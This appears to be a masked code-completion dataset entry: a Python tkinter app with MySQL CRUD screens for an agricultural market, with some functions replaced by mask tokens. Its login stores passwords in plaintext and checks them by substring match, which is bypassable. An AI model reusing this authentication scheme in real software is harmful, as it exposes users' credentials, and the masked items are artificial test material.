label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_company)\n button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef delete_farmer_command():\n try:\n sql = 'DELETE FROM farmer WHERE f_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n farmer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)\n Button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef update_command():\n try:\n sql = (\n 'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n update_farmer()\n\n\ndef search_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)\n Button.place(x=400, y=400)\n\n\ndef search():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)\n Button.place(x=300, 
y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',\n 'farmer mail: ', 'farmer locality: ', 'farmer address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_farmer()\n\n\ndef company():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_company)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_company)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_company)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_company)\n Button.place(x=410, y=50)\n view_company()\n\n\ndef view_company():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),\n xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id', text='Company Id')\n table.heading('c_name', text='Company Name')\n table.heading('c_address', text='Company Address')\n table['show'] = 
'headings'\n table.column('c_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM company;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\ndef insert_company():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company_id', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_company_command)\n Button.place(x=400, y=400)\n\n\ndef insert_company_command():\n try:\n if len(e1.get()) > 3:\n invalid('company')\n else:\n sql = 'INSERT INTO company values(%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get()\n cur.executemany(sql, [vals])\n db.commit()\n company()\n except:\n insert_company()\n\n\ndef delete_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql = 'DELETE FROM 
company WHERE c_id=%s;'\n cur.execute(sql, [int(e1.get())])\n db.commit()\n company()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_c():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Company_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_c)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_company()\n\n\n<mask token>\n\n\ndef search_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_c)\n Button.place(x=400, y=400)\n\n\ndef search_c():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n 
label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=company\n )\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['company id: ', 'company name: ', 'company address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Company Id', font=('times new roman', 15)\n )\n l.place(x=100, y=300)\n search_company()\n\n\ndef fertilizer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer Table', font=('Times new roman', \n 15), bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_fer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_fer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_fer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fer)\n Button.place(x=410, y=50)\n view_fer()\n\n\ndef view_fer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',\n 'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.\n set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n 
y_scroll.config(command=table.yview)\n table.heading('fe_formula', text='Fertilizer Formula')\n table.heading('fe_name', text='Fertilizer name')\n table.heading('fe_content', text='Fertilizer content')\n table.heading('fe_price', text='Fertilizer price')\n table.heading('company_id', text='Company_id')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM fertilizer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_fer_command():\n try:\n sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\n\n\ndef delete_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n fertilizer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)\n Button.place(x=300, 
y=400)\n\n\ndef update_fe():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Fertlizer formula', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Fertlizer name', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Fertlizer content', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Fertlizer price', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='comapny_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_fe)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_fer()\n\n\n<mask token>\n\n\ndef search_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n 
search_fe)\n Button.place(x=400, y=400)\n\n\ndef search_fe():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['fertilizer formula: ', 'fertilizer name: ',\n 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Fertilizer formula', font=(\n 'times new roman', 15))\n l.place(x=100, y=300)\n search_fer()\n\n\ndef orders():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Orders Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_ord)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_ord)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_ord)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_ord)\n Button.place(x=410, y=50)\n view_ord()\n\n\ndef view_ord():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',\n 'or_formula', 
'or_to'), xscrollcommand=x_scroll.set, yscrollcommand\n =y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id', text='Order Id')\n table.heading('or_date', text='Order Date')\n table.heading('or_fid', text='Ordered Farmer Id')\n table.heading('or_formula', text='Order (item)formula')\n table.heading('or_to', text='Order to')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM orders;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_ord():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Order date', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order FID', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e2.insert(0, datetime.now())\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_ord_command)\n Button.place(x=400, y=400)\n\n\ndef insert_ord_command():\n try:\n sql = 'INSERT INTO orders 
values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n except:\n insert_ord()\n\n\ndef delete_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql = 'DELETE FROM orders WHERE or_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n orders()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_or():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Order Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Order Date', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order f_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n 
count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_ord)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Order_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_ord()\n\n\ndef update_command_ord():\n sql = (\n 'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n\n\ndef search_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_or)\n Button.place(x=400, y=400)\n\n\ndef search_or():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['order Id: ', 'Order date: ', 'Order fid: ',\n 'Order formula: ', 'order to: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid order id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_ord()\n\n\ndef payment():\n global root\n label = Label(root, text=' ' * 800, 
font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Payment Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_pay)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_pay)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_pay)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pay)\n Button.place(x=410, y=50)\n view_pay()\n\n\ndef view_pay():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM payment;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_pay():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id', font=('Times new roman', 20),\n bg='white')\n 
label.place(x=50, y=10)\n label = Label(root, text='Transaction farmer id', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Transaction date', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Transaction amount', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Transaction method', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e3.insert(0, datetime.now())\n e4.place(x=350, y=160)\n e5 = StringVar(root)\n e5.set('Debit card')\n w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')\n w.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_pay_command)\n Button.place(x=400, y=400)\n\n\ndef insert_pay_command():\n try:\n sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n payment()\n except:\n insert_pay()\n\n\ndef delete_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_pay_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef search_pay():\n global e1\n label = Label(root, 
text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pa)\n Button.place(x=400, y=400)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef First_page(root):\n global T1, T2, T3\n frame = Frame(root, height=500, width=800, bg='ivory')\n frame.pack()\n label = Label(root, text='WELCOME TO AGRI MARKET', font=(\n 'Times new roman', 25))\n label.place(x=200, y=50)\n button = Button(root, text='LogIn', font=('times new roman', 20),\n command=check_pass, bg='green')\n button.place(x=350, y=350)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=280, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=280, y=250)\n reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=\n 'blue', command=create_pass)\n reg_button.place(x=340, y=400)\n\n\ndef check_pass():\n global root, T1, T2, T3\n try:\n with open('password.txt', 'r') as f:\n lines = f.read()\n if T1.get() + '=' + T2.get() in lines and T1.get(\n ) != '' and T2.get() != '':\n entity_page()\n else:\n label = Label(root, text=\n 'Invalid username or password.Try again', font=(\n 'times new roman', 15))\n label.place(x=200, y=100)\n except:\n label = Label(root, text='Invalid username or password.Try again',\n font=('times new roman', 15))\n label.place(x=200, y=100)\n\n\ndef create_pass():\n global root, T1, T2, T3\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=380, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=380, y=250)\n L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),\n bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width=30, 
show='*', bd=5)\n T3.place(x=380, y=300)\n reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=\n 'blue', command=add_pass)\n reg_button.place(x=440, y=400)\n\n\ndef add_pass():\n global root, T1, T2, T3\n if T2.get() != T3.get():\n label = Label(root, text='Incorrect Password. Enter again', font=(\n 'times new roman', 20))\n label.place(x=100, y=100)\n else:\n try:\n with open('password.txt', 'r') as f:\n data = f.read()\n with open('password.txt', 'w') as f:\n f.write(data + '\\n')\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n except:\n with open('password.txt', 'w') as f:\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n\n\ndef entity_page():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n label = Label(root, text='WELCOME TO AGRI MARKET ', font=(\n 'Times new roman', 20), bg='blue')\n label.place(x=200, y=20)\n label = Label(root, text='Choose the Entity ', font=('Times new roman',\n 20), bg='white')\n label.place(x=250, y=100)\n Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer\n )\n Button.place(x=100, y=150 + 25)\n Button = tk.Button(root, text='Company', font=('Arial', 15), command=\n company)\n Button.place(x=300, y=150 + 25)\n Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command\n =fertilizer)\n Button.place(x=500, y=150 + 25)\n Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)\n Button.place(x=200, y=300 + 25)\n Button = tk.Button(root, text='Payment', font=('Arial', 15), command=\n payment)\n Button.place(x=400, y=300 + 25)\n Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),\n command=history)\n Button.place(x=200, y=400 + 25)\n\n\ndef history():\n global root, cur, db\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 